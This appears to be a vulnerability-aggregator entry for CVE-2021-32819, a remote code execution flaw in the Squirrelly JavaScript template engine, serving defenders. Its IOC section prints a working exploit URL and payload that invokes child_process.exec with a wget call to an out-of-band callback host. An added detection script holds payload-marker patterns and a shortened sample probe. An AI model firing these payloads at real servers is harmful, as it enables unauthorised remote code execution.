CVE-2021-32819
Published 2021-05-14
CVE-2021-32819: Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine…
Priority P1 · 87 · high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 59.84% (99.0th percentile)
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| squirrelly | squirrelly | — | — |
| squirrelly | squirrelly | >= 0 < 9.0.0 | 9.0.0 |
| squirrellyjs | squirrelly | >= 9.0.0 < 9.0.0 | 9.0.0 |
Detection & IOCs (extracted from sources)
URL: `/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//`
Command: `var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http://{{interactsh-url}}');`
- Exploit arrives as a GET request with query parameters 'Express', 'autoEscape', and 'defaultFilter'; the 'defaultFilter' parameter carries a JavaScript injection payload that breaks out of the template context and invokes child_process.exec via global.process.mainModule.constructor._load.
- Successful exploitation can be confirmed via an out-of-band HTTP callback (OAST); look for an inbound HTTP request carrying 'User-Agent: Wget' originating from the target server.
- The attack overwrites internal Squirrelly configuration options (autoEscape, defaultFilter) through the Express render API query string, enabling template sandbox escape and RCE.
- The vulnerability affects Squirrelly versions up to and including 8.0.8; version 9.0.0 contains the fix. Detections should be scoped to deployments running affected versions.
- Exploitation requires the target application to expose user-controlled data to the Express render API query string (e.g., passing req.query directly as template locals), which is an application-level configuration issue.
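As an added example (not code from the advisory, the aggregator, or the Squirrelly project): a small Node.js detection pass over constructed access-log lines that flags requests carrying the Squirrelly engine option keys or the payload markers described in the IoCs above, alongside the allowlisting pattern that keeps req.query out of the render API. The log-line format, the key list and the marker regexes are assumptions of the example.

```javascript
// Added example (not from the advisory, the aggregator, or the Squirrelly project).
// Detection side: flag requests whose query string carries Squirrelly engine options
// or code-like payload markers. Mitigation side: copy only allowlisted scalar locals
// so req.query can never reach the render API. Log lines below are constructed.

// Engine configuration keys named in the advisory; a client has no business sending them.
const ENGINE_OPTION_KEYS = new Set(['autoEscape', 'defaultFilter']);
// Markers of the payload shape the IoCs describe (string breakout reaching child_process).
const PAYLOAD_MARKERS = [/require\s*\(/i, /child_process/i, /mainModule\.constructor\._load/i];

// Inspect one request path+query; returns a list of findings ([] when clean).
function inspectRenderRequest(rawPath) {
  let url;
  try { url = new URL(rawPath, 'http://placeholder.invalid'); } catch { return ['unparseable-url']; }
  const findings = [];
  for (const [key, value] of url.searchParams) { // searchParams percent-decodes and maps '+' to space
    if (ENGINE_OPTION_KEYS.has(key)) findings.push(`engine-option:${key}`);
    if (PAYLOAD_MARKERS.some((re) => re.test(value))) findings.push(`code-marker:${key}`);
  }
  return findings;
}

// Scan constructed access-log lines of the form: <ip> "<METHOD> <path> HTTP/x.y" <status> "<UA>".
function scanAccessLog(logText) {
  const hits = [];
  for (const line of logText.split('\n')) {
    const m = line.match(/^(\S+) "(\w+) (\S+) HTTP\/[\d.]+" (\d{3})/);
    if (!m) continue;
    const findings = inspectRenderRequest(m[3]);
    if (findings.length) hits.push({ ip: m[1], path: m[3], status: Number(m[4]), findings });
  }
  return hits;
}

// Hardened Express pattern: res.render('page', pickLocals(req.query, ['name']))
// instead of res.render('page', req.query). Only named string keys are copied.
function pickLocals(query, allowed) {
  const locals = {};
  for (const key of allowed) {
    if (typeof query[key] === 'string') locals[key] = query[key];
  }
  return locals;
}

// Constructed sample: one probe shaped like the IoC (payload shortened), one benign request.
const SAMPLE_LOG = [
  '203.0.113.7 "GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);require(%27child_process%27)%3B// HTTP/1.1" 200 "curl/7.68"',
  '198.51.100.4 "GET /?name=alice HTTP/1.1" 200 "Mozilla/5.0"',
].join('\n');
```

Running `scanAccessLog(SAMPLE_LOG)` returns one hit for the first line with three findings and nothing for the benign request.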
CVSS provenance
- NVD v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
- NVD v2.0: 6.8 MEDIUM (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- VulnCheck: 8.0 HIGH
GHSA
Insecure template handling in Squirrelly (ghsa · 2021-05-17 · HIGH · CWE-200)
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. Version 9.0.0 has a fix for this issue. For complete details refer to the referenced [GHSL-2021-023](https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/).
OSV
Insecure template handling in Squirrelly (osv · 2021-05-17 · HIGH)
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. Version 9.0.0 has a fix for this issue. For complete details refer to the referenced [GHSL-2021-023](https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/).
VulnCheck
squirrelly squirrelly Exposure of Sensitive Information to an Unauthorized Actor (vulncheck · 2021 · CVSS 8.0 · HIGH)
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.
Affected: squirrelly squirrelly
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-02-07&
No detection rules found.
Nuclei
Nodejs Squirrelly - Remote Code Execution (nuclei · CVSS 8.8 · HIGH)
Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
Template (excerpt):

```yaml
id: CVE-2021-32819

info:
  name: Nodejs Squirrelly - Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    Nodejs Squirrelly is susceptible to remote code execution.
```
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes (blogs_unit42 · 2021-10-14)
Authors: Yue Guan, Jin Chen, Leo Olson, Wayne Xin, Daiping Liu
Published: October 14, 2021
Tags: Cybercrime, Threat Research, Attack analysis, Exploit, Exploit in the wild, Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
GreyNoise
NoiseLetter October 2025 (blogs_greynoiseio)
References
- https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e
- https://github.com/squirrellyjs/squirrelly/commit/dca7a1e7ee91d8a6ffffb655f3f15647486db9da
- https://github.com/squirrellyjs/squirrelly/pull/254
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/